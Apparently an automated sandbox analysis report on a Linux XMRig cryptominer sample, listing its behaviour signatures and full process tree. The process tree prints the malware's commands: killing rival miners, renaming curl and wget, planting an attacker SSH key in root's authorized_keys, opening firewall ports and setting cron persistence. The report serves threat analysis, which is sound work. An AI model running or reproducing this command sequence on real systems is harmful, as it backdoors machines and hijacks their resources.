Analysis
-
max time kernel
48s -
max time network
51s -
platform
ubuntu-22.04_amd64 -
resource
ubuntu2204-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu2204-amd64-20240611-enkernel:5.15.0-105-genericlocale:en-usos:ubuntu-22.04-amd64system -
submitted
03/12/2024, 23:54
Behavioral task
behavioral1
Sample
work32
Resource
ubuntu2204-amd64-20240611-en
General
-
Target
work32
-
Size
4.2MB
-
MD5
06e1f988471336d788da0fcaa29ed50b
-
SHA1
2fa461cd8f0614dfb86f845aef47c42910370b00
-
SHA256
7f28b2791ad94a202eea5e4c91d47cdeadca4723723427af574519f8aedbf15e
-
SHA512
4ed849872ad844df311fa5e80246b143d76c1b0a432e9d38771e8a66fa42f71a683b52e41a8e3fbdd090152088c96176bdf6820478ceb5b5ab9f77284336b180
-
SSDEEP
98304:Wr3wZHTOxuXKMHQOdgK6a4mR3chE+Agclmvj2iw+w:WbwZDXDHQOdg0Bo6l
Malware Config
Signatures
-
Xmrig family
-
XMRig Miner payload 1 IoCs
resource yara_rule behavioral1/memory/1753-3-0x0000000008048000-0x00000000084c01a4-memory.dmp xmrig -
Adds new SSH keys 1 TTPs 2 IoCs
Linux special file to hold SSH keys. The threat actor may add new keys for further remote access.
description ioc Process File opened for modification /root/.ssh/authorized_keys sh File opened for modification /root/.ssh/authorized_keys sh -
Contacts a large (1879) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Patched UPX-packed file 2 IoCs
Sample is packed with UPX but required header fields are zeroed out to prevent unpacking with the default UPX tool.
resource yara_rule behavioral1/files/fstream-2.dat patched_upx behavioral1/files/fstream-9.dat patched_upx -
File and Directory Permissions Modification 1 TTPs 6 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1751 chmod 1755 sh 1757 chmod 1763 sh 1765 chmod 1750 sh -
Executes dropped EXE 3 IoCs
ioc pid Process /tmp/xmr 1753 xmr /tmp/secure.sh 1761 secure.sh /tmp/auth.sh 1769 auth.sh -
Checks hardware identifiers (DMI) 1 TTPs 4 IoCs
Checks DMI information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /sys/devices/virtual/dmi/id/product_name xmr File opened for reading /sys/devices/virtual/dmi/id/board_vendor xmr File opened for reading /sys/devices/virtual/dmi/id/bios_vendor xmr File opened for reading /sys/devices/virtual/dmi/id/sys_vendor xmr -
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates/modifies Cron job 1 TTPs 2 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /var/spool/cron/crontabs/root work32 File opened for modification /etc/crontab work32 -
Enumerates running processes
Discovers information about currently running processes on the system
-
Reads hardware information 1 TTPs 14 IoCs
Accesses system info like serial numbers, manufacturer names etc.
description ioc Process File opened for reading /sys/devices/virtual/dmi/id/chassis_vendor xmr File opened for reading /sys/devices/virtual/dmi/id/chassis_version xmr File opened for reading /sys/devices/virtual/dmi/id/bios_version xmr File opened for reading /sys/devices/virtual/dmi/id/board_version xmr File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag xmr File opened for reading /sys/devices/virtual/dmi/id/bios_date xmr File opened for reading /sys/devices/virtual/dmi/id/product_uuid xmr File opened for reading /sys/devices/virtual/dmi/id/chassis_type xmr File opened for reading /sys/devices/virtual/dmi/id/product_version xmr File opened for reading /sys/devices/virtual/dmi/id/product_serial xmr File opened for reading /sys/devices/virtual/dmi/id/board_name xmr File opened for reading /sys/devices/virtual/dmi/id/board_serial xmr File opened for reading /sys/devices/virtual/dmi/id/board_asset_tag xmr File opened for reading /sys/devices/virtual/dmi/id/chassis_serial xmr -
resource yara_rule behavioral1/files/fstream-2.dat upx behavioral1/files/fstream-9.dat upx -
Checks CPU configuration 1 TTPs 1 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo xmr -
Reads CPU attributes 1 TTPs 38 IoCs
description ioc Process File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online kill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online kill File opened for reading /sys/devices/system/cpu/online kill File opened for reading /sys/devices/system/cpu/online kill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online kill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online xmr File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online kill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online kill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online kill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online kill File opened for reading /sys/devices/system/cpu/online kill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online kill File opened for reading /sys/devices/system/cpu/online kill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online kill File opened for reading /sys/devices/system/cpu/online kill File opened for reading /sys/devices/system/cpu/online kill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online kill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online kill File opened for reading /sys/devices/system/cpu/possible xmr File opened for reading /sys/devices/system/cpu/online kill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps -
Enumerates kernel/hardware configuration 1 TTPs 56 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
description ioc Process File opened for reading /sys/kernel/mm/transparent_hugepage/hpage_pmd_size work32 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/coherency_line_size xmr File opened for reading /sys/bus/node/devices/node0/hugepages xmr File opened for reading /sys/fs/cgroup/cpuset.cpus.effective xmr File opened for reading /sys/bus/cpu/devices/cpu0/cache/index5/shared_cpu_map xmr File opened for reading /sys/fs/cgroup/cpuset.mems.effective xmr File opened for reading /sys/kernel/mm/transparent_hugepage/hpage_pmd_size work32 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/level xmr File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/type xmr File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/shared_cpu_map xmr File opened for reading /sys/bus/cpu/devices/cpu0/cache/index8/shared_cpu_map xmr File opened for reading /sys/kernel/mm/hugepages xmr File opened for reading /sys/bus/cpu/devices/cpu0/cache/index1/type xmr File opened for reading /sys/bus/cpu/devices/cpu0/topology/core_cpus xmr File opened for reading /sys/bus/cpu/devices/cpu0/topology/die_cpus xmr File opened for reading /sys/bus/cpu/devices/cpu0/topology/package_cpus xmr File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/coherency_line_size xmr File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/physical_line_partition xmr File opened for reading /sys/bus/node/devices/node0/hugepages/hugepages-1048576kB/nr_hugepages xmr File opened for reading /sys/bus/dax/devices/target_node xmr File opened for reading /sys/devices/system/cpu xmr File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/size xmr File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/level xmr File opened for reading /sys/bus/cpu/devices/cpu0/cache/index4/shared_cpu_map xmr File opened for reading /sys/devices/system/node/online xmr File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/physical_line_partition xmr File opened for reading /sys/bus/node/devices/node0/access0/initiators xmr File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/level xmr File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/type xmr File opened for reading /sys/bus/cpu/devices/cpu0/cache/index9/shared_cpu_map xmr File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/number_of_sets xmr File opened for reading /sys/bus/cpu/devices xmr File opened for reading /sys/bus/cpu/devices/cpu0/cache/index1/level xmr File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/shared_cpu_map xmr File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/type xmr File opened for reading /sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages xmr File opened for reading /sys/devices/virtual/dmi/id xmr File opened for reading /sys/fs/cgroup/cgroup.controllers xmr File opened for reading /sys/bus/cpu/devices/cpu0/cache/index1/shared_cpu_map xmr File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/shared_cpu_map xmr File opened for reading /sys/bus/dax/target_node xmr File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/number_of_sets xmr File opened for reading /sys/bus/cpu/devices/cpu0/topology/physical_package_id xmr File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/physical_line_partition xmr File opened for reading /sys/bus/cpu/devices/cpu0/cache/index7/shared_cpu_map xmr File opened for reading /sys/bus/dax/devices xmr File opened for reading /sys/bus/cpu/devices/cpu0/cache/index6/shared_cpu_map xmr File opened for reading /sys/bus/node/devices/node0/hugepages/hugepages-2048kB/nr_hugepages xmr File opened for reading /sys/bus/node/devices/node0/cpumap xmr File opened for reading /sys/bus/node/devices/node0/meminfo xmr File opened for reading /sys/bus/cpu/devices/cpu0/topology/core_id xmr File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/size xmr File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/coherency_line_size xmr File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/size xmr File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/number_of_sets xmr File opened for reading /sys/kernel/mm/hugepages/hugepages-1048576kB/nr_hugepages xmr -
description ioc Process File opened for reading /proc/95/stat ps File opened for reading /proc/1085/stat ps File opened for reading /proc/93/status ps File opened for reading /proc/1660/cmdline ps File opened for reading /proc/96/status ps File opened for reading /proc/5/status ps File opened for reading /proc/1177/stat ps File opened for reading /proc/15/status ps File opened for reading /proc/1145/stat ps File opened for reading /proc/223/cmdline ps File opened for reading /proc/92/cmdline ps File opened for reading /proc/self/maps grep File opened for reading /proc/632/cmdline ps File opened for reading /proc/118/stat ps File opened for reading /proc/1643/cmdline ps File opened for reading /proc/1299/status ps File opened for reading /proc/20/status ps File opened for reading /proc/780/stat ps File opened for reading /proc/96/cmdline ps File opened for reading /proc/96/stat ps File opened for reading /proc/88/status ps File opened for reading /proc/962/cmdline ps File opened for reading /proc/22/status ps File opened for reading /proc/1294/status ps File opened for reading /proc/1277/status ps File opened for reading /proc/1419/cmdline ps File opened for reading /proc/12/status ps File opened for reading /proc/1323/cmdline ps File opened for reading /proc/1192/status ps File opened for reading /proc/self/fd xargs File opened for reading /proc/1184/cmdline ps File opened for reading /proc/741/status ps File opened for reading /proc/1202/stat ps File opened for reading /proc/1277/status ps File opened for reading /proc/373/stat ps File opened for reading /proc/1299/stat ps File opened for reading /proc/1537/stat ps File opened for reading /proc/91/status ps File opened for reading /proc/219/stat ps File opened for reading /proc/523/status ps File opened for reading /proc/1707/status ps File opened for reading /proc/425/status ps File opened for reading /proc/uptime ps File opened for reading /proc/85/status ps File opened for reading /proc/81/cmdline ps File opened for reading /proc/406/status ps File opened for reading /proc/632/stat ps File opened for reading /proc/603/stat ps File opened for reading /proc/589/stat ps File opened for reading /proc/1320/status ps File opened for reading /proc/stat ps File opened for reading /proc/1162/status ps File opened for reading /proc/1085/cmdline ps File opened for reading /proc/25/stat ps File opened for reading /proc/1177/stat ps File opened for reading /proc/1040/cmdline ps File opened for reading /proc/160/status ps File opened for reading /proc/sys/kernel/pid_max ps File opened for reading /proc/409/status ps File opened for reading /proc/meminfo ps File opened for reading /proc/1162/status ps File opened for reading /proc/1317/stat killall File opened for reading /proc/1090/stat ps File opened for reading /proc/1323/stat ps -
System Network Configuration Discovery 1 TTPs 4 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1806 sh 1797 sh 1799 sh 1803 sh -
Writes file to tmp directory 4 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/config.json work32 File opened for modification /tmp/xmr work32 File opened for modification /tmp/secure.sh work32 File opened for modification /tmp/auth.sh work32
Processes
-
/tmp/work32/tmp/work321⤵
- Enumerates kernel/hardware configuration
PID:1596 -
/tmp/work32/tmp/work32 -deamon2⤵
- Creates/modifies Cron job
- Enumerates kernel/hardware configuration
- Writes file to tmp directory
PID:1601 -
/usr/bin/shsh -c "ps -ef | grep Circle_MI | grep -v grep | awk '{print \$2}' | xargs kill -9"3⤵PID:1618
-
/usr/bin/grepgrep -v grep4⤵PID:1621
-
-
/usr/bin/grepgrep Circle_MI4⤵PID:1620
-
-
/usr/bin/awkawk "{print \$2}"4⤵PID:1622
-
-
/usr/bin/xargsxargs kill -94⤵PID:1623
-
/usr/local/sbin/killkill -95⤵PID:1624
-
-
/usr/local/bin/killkill -95⤵PID:1624
-
-
/usr/sbin/killkill -95⤵PID:1624
-
-
/usr/bin/killkill -95⤵
- Reads CPU attributes
PID:1624
-
-
-
/usr/bin/psps -ef4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1619
-
-
-
/usr/bin/shsh -c "ps -ef | grep kworker34 | grep -v grep | awk '{print \$2}' | xargs kill -9"3⤵PID:1625
-
/usr/bin/grepgrep -v grep4⤵PID:1628
-
-
/usr/bin/grepgrep kworker344⤵PID:1627
-
-
/usr/bin/awkawk "{print \$2}"4⤵PID:1629
-
-
/usr/bin/xargsxargs kill -94⤵PID:1630
-
/usr/local/sbin/killkill -95⤵PID:1631
-
-
/usr/local/bin/killkill -95⤵PID:1631
-
-
/usr/sbin/killkill -95⤵PID:1631
-
-
/usr/bin/killkill -95⤵
- Reads CPU attributes
PID:1631
-
-
-
/usr/bin/psps -ef4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1626
-
-
-
/usr/bin/shsh -c "ps -ef | grep .daemond | grep -v grep | awk '{print \$2}' | xargs kill -9"3⤵PID:1632
-
/usr/bin/grepgrep -v grep4⤵PID:1635
-
-
/usr/bin/grepgrep .daemond4⤵PID:1634
-
-
/usr/bin/psps -ef4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1633
-
-
/usr/bin/awkawk "{print \$2}"4⤵PID:1636
-
-
/usr/bin/xargsxargs kill -94⤵PID:1637
-
/usr/local/sbin/killkill -95⤵PID:1638
-
-
/usr/local/bin/killkill -95⤵PID:1638
-
-
/usr/sbin/killkill -95⤵PID:1638
-
-
/usr/bin/killkill -95⤵
- Reads CPU attributes
PID:1638
-
-
-
-
/usr/bin/shsh -c "ps -ef | grep /tmp/thisxxs | grep -v grep | awk '{print \$2}' | xargs kill -9"3⤵PID:1639
-
/usr/bin/xargsxargs kill -94⤵PID:1644
-
/usr/local/sbin/killkill -95⤵PID:1645
-
-
/usr/local/bin/killkill -95⤵PID:1645
-
-
/usr/sbin/killkill -95⤵PID:1645
-
-
/usr/bin/killkill -95⤵
- Reads CPU attributes
PID:1645
-
-
-
/usr/bin/awkawk "{print \$2}"4⤵PID:1643
-
-
/usr/bin/grepgrep -v grep4⤵PID:1642
-
-
/usr/bin/grepgrep /tmp/thisxxs4⤵PID:1641
-
-
/usr/bin/psps -ef4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1640
-
-
-
/usr/bin/shsh -c "ps -ef | grep /opt/yilu/work/xig/xig | grep -v grep | awk '{print \$2}' | xargs kill -9"3⤵PID:1646
-
/usr/bin/xargsxargs kill -94⤵PID:1651
-
/usr/local/sbin/killkill -95⤵PID:1652
-
-
/usr/local/bin/killkill -95⤵PID:1652
-
-
/usr/sbin/killkill -95⤵PID:1652
-
-
/usr/bin/killkill -95⤵
- Reads CPU attributes
PID:1652
-
-
-
/usr/bin/awkawk "{print \$2}"4⤵PID:1650
-
-
/usr/bin/grepgrep -v grep4⤵PID:1649
-
-
/usr/bin/grepgrep /opt/yilu/work/xig/xig4⤵PID:1648
-
-
/usr/bin/psps -ef4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1647
-
-
-
/usr/bin/shsh -c "ps -ef | grep /opt/yilu/mservice | grep -v grep | awk '{print \$2}' | xargs kill -9"3⤵PID:1653
-
/usr/bin/xargsxargs kill -94⤵PID:1658
-
/usr/local/sbin/killkill -95⤵PID:1659
-
-
/usr/local/bin/killkill -95⤵PID:1659
-
-
/usr/sbin/killkill -95⤵PID:1659
-
-
/usr/bin/killkill -95⤵
- Reads CPU attributes
PID:1659
-
-
-
/usr/bin/awkawk "{print \$2}"4⤵PID:1657
-
-
/usr/bin/grepgrep -v grep4⤵PID:1656
-
-
/usr/bin/grepgrep /opt/yilu/mservice4⤵PID:1655
-
-
/usr/bin/psps -ef4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1654
-
-
-
/usr/bin/shsh -c "ps -ef | grep /usr/bin/.sshd | grep -v grep | awk '{print \$2}' | xargs kill -9"3⤵PID:1660
-
/usr/bin/grepgrep -v grep4⤵PID:1663
-
-
/usr/bin/awkawk "{print \$2}"4⤵PID:1664
-
-
/usr/bin/grepgrep /usr/bin/.sshd4⤵PID:1662
-
-
/usr/bin/xargsxargs kill -94⤵PID:1665
-
/usr/local/sbin/killkill -95⤵PID:1666
-
-
/usr/local/bin/killkill -95⤵PID:1666
-
-
/usr/sbin/killkill -95⤵PID:1666
-
-
/usr/bin/killkill -95⤵
- Reads CPU attributes
PID:1666
-
-
-
/usr/bin/psps -ef4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1661
-
-
-
/usr/bin/shsh -c "ps -ef | grep /usr/bin/bsd-port/getty | grep -v grep | awk '{print \$2}' | xargs kill -9"3⤵PID:1667
-
/usr/bin/xargsxargs kill -94⤵PID:1672
-
/usr/local/sbin/killkill -95⤵PID:1673
-
-
/usr/local/bin/killkill -95⤵PID:1673
-
-
/usr/sbin/killkill -95⤵PID:1673
-
-
/usr/bin/killkill -95⤵
- Reads CPU attributes
PID:1673
-
-
-
/usr/bin/awkawk "{print \$2}"4⤵PID:1671
-
-
/usr/bin/grepgrep -v grep4⤵PID:1670
-
-
/usr/bin/grepgrep /usr/bin/bsd-port/getty4⤵PID:1669
-
-
/usr/bin/psps -ef4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1668
-
-
-
/usr/bin/shsh -c "ps -ef | grep x86_ | grep -v grep | awk '{print \$2}' | xargs kill -9"3⤵PID:1674
-
/usr/bin/xargsxargs kill -94⤵PID:1679
-
/usr/local/sbin/killkill -95⤵PID:1680
-
-
/usr/local/bin/killkill -95⤵PID:1680
-
-
/usr/sbin/killkill -95⤵PID:1680
-
-
/usr/bin/killkill -95⤵
- Reads CPU attributes
PID:1680
-
-
-
/usr/bin/awkawk "{print \$2}"4⤵PID:1678
-
-
/usr/bin/grepgrep -v grep4⤵PID:1677
-
-
/usr/bin/grepgrep x86_4⤵PID:1676
-
-
/usr/bin/psps -ef4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1675
-
-
-
/usr/bin/shsh -c "ps -ef | grep cryptonight | grep -v grep | awk '{print \$2}' | xargs kill -9"3⤵PID:1681
-
/usr/bin/xargsxargs kill -94⤵PID:1686
-
/usr/local/sbin/killkill -95⤵PID:1687
-
-
/usr/local/bin/killkill -95⤵PID:1687
-
-
/usr/sbin/killkill -95⤵PID:1687
-
-
/usr/bin/killkill -95⤵
- Reads CPU attributes
PID:1687
-
-
-
/usr/bin/awkawk "{print \$2}"4⤵PID:1685
-
-
/usr/bin/grepgrep -v grep4⤵PID:1684
-
-
/usr/bin/grepgrep cryptonight4⤵PID:1683
-
-
/usr/bin/psps -ef4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1682
-
-
-
/usr/bin/shsh -c "ps -ef | grep ddg | grep -v grep | awk '{print \$2}' | xargs kill -9"3⤵PID:1688
-
/usr/bin/xargsxargs kill -94⤵PID:1693
-
/usr/local/sbin/killkill -95⤵PID:1694
-
-
/usr/local/bin/killkill -95⤵PID:1694
-
-
/usr/sbin/killkill -95⤵PID:1694
-
-
/usr/bin/killkill -95⤵
- Reads CPU attributes
PID:1694
-
-
-
/usr/bin/awkawk "{print \$2}"4⤵PID:1692
-
-
/usr/bin/grepgrep -v grep4⤵PID:1691
-
-
/usr/bin/grepgrep ddg4⤵PID:1690
-
-
/usr/bin/psps -ef4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1689
-
-
-
/usr/bin/shsh -c "ps -ef | grep prohash | grep -v grep | awk '{print \$2}' | xargs kill -9"3⤵PID:1695
-
/usr/bin/xargsxargs kill -94⤵PID:1700
-
/usr/local/sbin/killkill -95⤵PID:1701
-
-
/usr/local/bin/killkill -95⤵PID:1701
-
-
/usr/sbin/killkill -95⤵PID:1701
-
-
/usr/bin/killkill -95⤵
- Reads CPU attributes
PID:1701
-
-
-
/usr/bin/awkawk "{print \$2}"4⤵PID:1699
-
-
/usr/bin/grepgrep -v grep4⤵PID:1698
-
-
/usr/bin/grepgrep prohash4⤵PID:1697
-
-
/usr/bin/psps -ef4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1696
-
-
-
/usr/bin/shsh -c "ps -ef | grep monero | grep -v grep | awk '{print \$2}' | xargs kill -9"3⤵PID:1702
-
/usr/bin/xargsxargs kill -94⤵PID:1707
-
/usr/local/sbin/killkill -95⤵PID:1708
-
-
/usr/local/bin/killkill -95⤵PID:1708
-
-
/usr/sbin/killkill -95⤵PID:1708
-
-
/usr/bin/killkill -95⤵
- Reads CPU attributes
PID:1708
-
-
-
/usr/bin/awkawk "{print \$2}"4⤵PID:1706
-
-
/usr/bin/grepgrep -v grep4⤵PID:1705
-
-
/usr/bin/grepgrep monero4⤵PID:1704
-
-
/usr/bin/psps -ef4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1703
-
-
-
/usr/bin/shsh -c "ps -ef | grep xmr | grep -v grep | awk '{print \$2}' | xargs kill -9"3⤵PID:1709
-
/usr/bin/xargsxargs kill -94⤵PID:1714
-
/usr/local/sbin/killkill -95⤵PID:1715
-
-
/usr/local/bin/killkill -95⤵PID:1715
-
-
/usr/sbin/killkill -95⤵PID:1715
-
-
/usr/bin/killkill -95⤵
- Reads CPU attributes
PID:1715
-
-
-
/usr/bin/awkawk "{print \$2}"4⤵PID:1713
-
-
/usr/bin/grepgrep -v grep4⤵PID:1712
-
-
/usr/bin/grepgrep xmr4⤵
- Reads runtime system information
PID:1711
-
-
/usr/bin/psps -ef4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1710
-
-
-
/usr/bin/shsh -c "ps -ef | grep miner | grep -v grep | awk '{print \$2}' | xargs kill -9"3⤵PID:1716
-
/usr/bin/xargsxargs kill -94⤵
- Reads runtime system information
PID:1721 -
/usr/local/sbin/killkill -95⤵PID:1722
-
-
/usr/local/bin/killkill -95⤵PID:1722
-
-
/usr/sbin/killkill -95⤵PID:1722
-
-
/usr/bin/killkill -95⤵
- Reads CPU attributes
PID:1722
-
-
-
/usr/bin/awkawk "{print \$2}"4⤵PID:1720
-
-
/usr/bin/grepgrep -v grep4⤵PID:1719
-
-
/usr/bin/grepgrep miner4⤵PID:1718
-
-
/usr/bin/psps -ef4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1717
-
-
-
/usr/bin/shsh -c "ps -ef | grep pool. | grep -v grep | awk '{print \$2}' | xargs kill -9"3⤵PID:1723
-
/usr/bin/xargsxargs kill -94⤵PID:1728
-
/usr/local/sbin/killkill -95⤵PID:1729
-
-
/usr/local/bin/killkill -95⤵PID:1729
-
-
/usr/sbin/killkill -95⤵PID:1729
-
-
/usr/bin/killkill -95⤵
- Reads CPU attributes
PID:1729
-
-
-
/usr/bin/awkawk "{print \$2}"4⤵PID:1727
-
-
/usr/bin/grepgrep -v grep4⤵PID:1726
-
-
/usr/bin/grepgrep pool.4⤵PID:1725
-
-
/usr/bin/psps -ef4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1724
-
-
-
/usr/bin/shsh -c "ps -ef | grep tcp: | grep -v grep | awk '{print \$2}' | xargs kill -9"3⤵PID:1730
-
/usr/bin/xargsxargs kill -94⤵PID:1735
-
/usr/local/sbin/killkill -95⤵PID:1736
-
-
/usr/local/bin/killkill -95⤵PID:1736
-
-
/usr/sbin/killkill -95⤵PID:1736
-
-
/usr/bin/killkill -95⤵
- Reads CPU attributes
PID:1736
-
-
-
/usr/bin/awkawk "{print \$2}"4⤵PID:1734
-
-
/usr/bin/grepgrep -v grep4⤵PID:1733
-
-
/usr/bin/grepgrep tcp:4⤵PID:1732
-
-
/usr/bin/psps -ef4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1731
-
-
-
/usr/bin/shsh -c "ps -ef | grep stratum | grep -v grep | awk '{print \$2}' | xargs kill -9"3⤵PID:1737
-
/usr/bin/xargsxargs kill -94⤵PID:1742
-
/usr/local/sbin/killkill -95⤵PID:1743
-
-
/usr/local/bin/killkill -95⤵PID:1743
-
-
/usr/sbin/killkill -95⤵PID:1743
-
-
/usr/bin/killkill -95⤵
- Reads CPU attributes
PID:1743
-
-
-
/usr/bin/awkawk "{print \$2}"4⤵PID:1741
-
-
/usr/bin/grepgrep -v grep4⤵PID:1740
-
-
/usr/bin/grepgrep stratum4⤵PID:1739
-
-
/usr/bin/psps -ef4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1738
-
-
-
/usr/bin/shsh -c "killall xmr"3⤵PID:1744
-
/usr/bin/killallkillall xmr4⤵
- Reads runtime system information
PID:1745
-
-
-
/usr/bin/shsh -c "mv /usr/bin/wget /usr/bin/wget1&"3⤵PID:1746
-
-
/usr/bin/shsh -c "mv /usr/bin/curl /usr/bin/curl1&"3⤵PID:1748
-
-
/usr/bin/shsh -c "chmod +x /tmp/xmr"3⤵
- File and Directory Permissions Modification
PID:1750 -
/usr/bin/chmodchmod +x /tmp/xmr4⤵
- File and Directory Permissions Modification
PID:1751
-
-
-
/usr/bin/shsh -c /tmp/xmr3⤵PID:1752
-
/tmp/xmr/tmp/xmr4⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
PID:1753
-
-
-
/usr/bin/shsh -c "chmod +x /tmp/secure.sh"3⤵
- File and Directory Permissions Modification
PID:1755 -
/usr/bin/chmodchmod +x /tmp/secure.sh4⤵
- File and Directory Permissions Modification
PID:1757
-
-
-
/usr/bin/shsh -c "/tmp/secure.sh&"3⤵PID:1759
-
-
/usr/bin/shsh -c "chmod +x /tmp/auth.sh"3⤵
- File and Directory Permissions Modification
PID:1763 -
/usr/bin/chmodchmod +x /tmp/auth.sh4⤵
- File and Directory Permissions Modification
PID:1765
-
-
-
/usr/bin/shsh -c "/tmp/auth.sh&"3⤵PID:1767
-
-
/usr/bin/shsh -c "mkdir -p /usr/.work"3⤵PID:1770
-
/usr/bin/mkdirmkdir -p /usr/.work4⤵PID:1777
-
-
-
/usr/bin/shsh -c "\\cp -R /tmp/* /usr/.work/ &"3⤵PID:1779
-
-
/usr/bin/shsh -c "chmod 700 /root/.ssh/"3⤵PID:1783
-
/usr/bin/chmodchmod 700 /root/.ssh/4⤵PID:1790
-
-
-
/usr/bin/shsh -c "echo >> /root/.ssh/authorized_keys"3⤵
- Adds new SSH keys
PID:1791
-
-
/usr/bin/shsh -c "chmod 600 /root/.ssh/authorized_keys"3⤵PID:1793
-
/usr/bin/chmodchmod 600 /root/.ssh/authorized_keys4⤵PID:1794
-
-
-
/usr/bin/shsh -c "echo \"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDc3BlbiQaznPT8TScrs9YIzmrpI9Lpa4LtCjB5z0LuQ4o6XwvzomxAixn2F1jaUl175Cxcg3PmUsPOLE+WeWicKqL2YZ46SotjZgnS6JjXpuZVi7V0DSiXu0itlwWDC9m8huBvUBSIsDCsgb9OeG6rlrCyZgTW+qZciK+KZ8rwlFp3CFyxoF2122ueOnl5pAUCy1iHqGun03dMdUxA1d3KnxSZ3NQrYiH69dc8/YhV4SriOW9psc0pv9KeBLF0OXHtEAdbnSlwfk2uTjjBMK0nDidl7wS52Ygi/H4+P+4EXkSzf4Jj4/L6P3c5rLC3/l3RFdo1T7EQ8fH6NsTYJNZ7 root@u911\" >> /root/.ssh/authorized_keys"3⤵
- Adds new SSH keys
PID:1795
-
-
/usr/bin/shsh -c "iptables -I INPUT -p tcp --dport 8013 -j ACCEPT"3⤵PID:1796
-
-
/usr/bin/shsh -c "iptables -I OUTPUT -p tcp --sport 8013 -j ACCEPT"3⤵
- System Network Configuration Discovery
PID:1797
-
-
/usr/bin/shsh -c "iptables -I PREROUTING -t nat -p tcp --dport 8013 -j ACCEPT"3⤵PID:1798
-
-
/usr/bin/shsh -c "iptables -I POSTROUTING -t nat -p tcp --sport 8013 -j ACCEPT"3⤵
- System Network Configuration Discovery
PID:1799
-
-
/bin/shsh -c "iptables -I INPUT -p udp --dport 41736 -j ACCEPT"3⤵PID:1800
-
-
/usr/bin/shsh -c "ulimit -n"3⤵PID:1801
-
-
/bin/shsh -c "iptables -I OUTPUT -p udp --sport 41736 -j ACCEPT"3⤵
- System Network Configuration Discovery
PID:1803
-
-
/bin/shsh -c "iptables -I PREROUTING -t nat -p udp --dport 41736 -j ACCEPT"3⤵PID:1804
-
-
/usr/bin/getentgetent passwd 03⤵PID:1805
-
-
/bin/shsh -c "iptables -I POSTROUTING -t nat -p udp --sport 41736 -j ACCEPT"3⤵
- System Network Configuration Discovery
PID:1806
-
-
/usr/bin/getentgetent passwd 03⤵PID:1817
-
-
/usr/bin/getentgetent passwd 03⤵PID:1818
-
-
/usr/bin/getentgetent passwd 03⤵PID:1824
-
-
/usr/bin/getentgetent passwd 03⤵PID:1825
-
-
